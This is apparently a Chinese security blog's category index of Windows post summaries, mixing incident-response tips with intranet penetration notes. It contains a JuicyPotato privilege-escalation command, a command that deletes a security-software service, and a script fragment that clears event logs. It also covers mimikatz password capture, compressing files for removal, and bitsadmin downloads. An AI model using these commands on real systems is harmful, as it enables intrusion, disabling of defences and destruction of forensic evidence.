随笔分类 - windows
windows安全
摘要:用法"C:\ProgramData\JuicyPotato.exe" -t * -l 1337 -c {0A886F29-465A-4aea-8B8E-BE926BFAE83E} -p whoami 2008R2系统SYSTEM权限的CLSID: Copy to clipboard {03ca98d
阅读全文
摘要:Windows应急日志常用的几个事件ID点击站内没有搜索到,可能搜索姿势不对,发一下吧,应急时可能会用到,根据日志时间点判断入侵日志路径:C:\Windows\System32\winevt\Logs查看日志:Security.evtx、System.evtx、Application.evtx如何查
阅读全文
摘要:windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.E
阅读全文
摘要:sc delete safedogguardcenter shutdown -r -t 00 两条命令搞定
阅读全文
摘要:最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题: ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDiges
阅读全文
摘要:在内网渗透时,当没有rar、7z等压缩工具时候,拖取文件的时候为了防止流量过大,又必须压缩把文件压缩。当然你可以自己上传一个压缩工具。Windows自带制作压缩文件工具makecb你可以了解哈。压缩单文件makecab 1.doc 1.zip至于是压缩成zip、rar、cab看你个人喜欢解压命令ex
阅读全文
摘要:WINDOWS自带的工具certutil.exe, certutil -hashfile chropp.exe MD5; 就可以了
阅读全文
摘要:测试环境:windows 10 道友们应该碰到过管理在本地保存远程终端的凭据,凭据里躺着诱人的胴体(服务器密码),早已让我们的XX饥渴难耐了。但是,胴体却裹了一身道袍(加密),待老衲操起法器将其宽衣解带。 0x01 凭据管理器中查看Windows凭据: TERMSRV/1xx.xxx.xxx.xx2
阅读全文
摘要:#!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ ''' import requests import itertools characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"...
阅读全文
摘要:简介 安全测试工具可能含有攻击性,请谨慎适用于安全教学及学习用途,禁止非法利用! EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
阅读全文
摘要:原文链接:https://www.t00ls.net/viewthread.php?tid=39343
阅读全文
摘要:前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。 今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。 相关知识点总结如下: 免
阅读全文
摘要:如果你碰到一个 Sa权限的注入点,你可以执行dos命令,但是你发现站库分离,数据库和web不在一个服务器上,而且悲剧的是数据库服务器又是个内网,这个时候你该怎么办? 这里就需要用到Bitsadmin来下载东西进去了,在windows08上测试成功了。 一个实例:https://xianzhi.ali
阅读全文
摘要:在星外不是安全模式的时候 但是又没有执行目录 有时候远程调用也不行对吧 winrar 有执行权限的时候C:\windows\IIS Temporary Compressed Files\ 这个目录有点特殊。如果你直接在shell上操作 上传 下载 复制 移动到这目录是没有权限的但是大牛说的 如果有w
阅读全文
摘要:这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。 1.获取操作系统信息 识别操作系统名称及版本: 当然中文系统你得这样: 识别系统体系结构: C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE
阅读全文
摘要:原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html https://raw.githubusercontent.com/PowerShellEmpire/Pow
阅读全文
摘要:@echo off echo on error resume next>clear.vbs echo set wmi_clear=getobject("winmgmts:\\.\root\cimv2")>>clear.vbs echo dim lianan_names(2)>>clear.vbs echo lianan_names(0)="application">>clear.vbs echo...
阅读全文
摘要:Mimikatz是一款能够从Windows中获取内存,并且获取明文密码和NTLM哈希值的神器,本文将介绍如何防御这款软件获取密码。 Mimikatz介绍 Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的工具,攻击者可以借此漫游内网。他们
阅读全文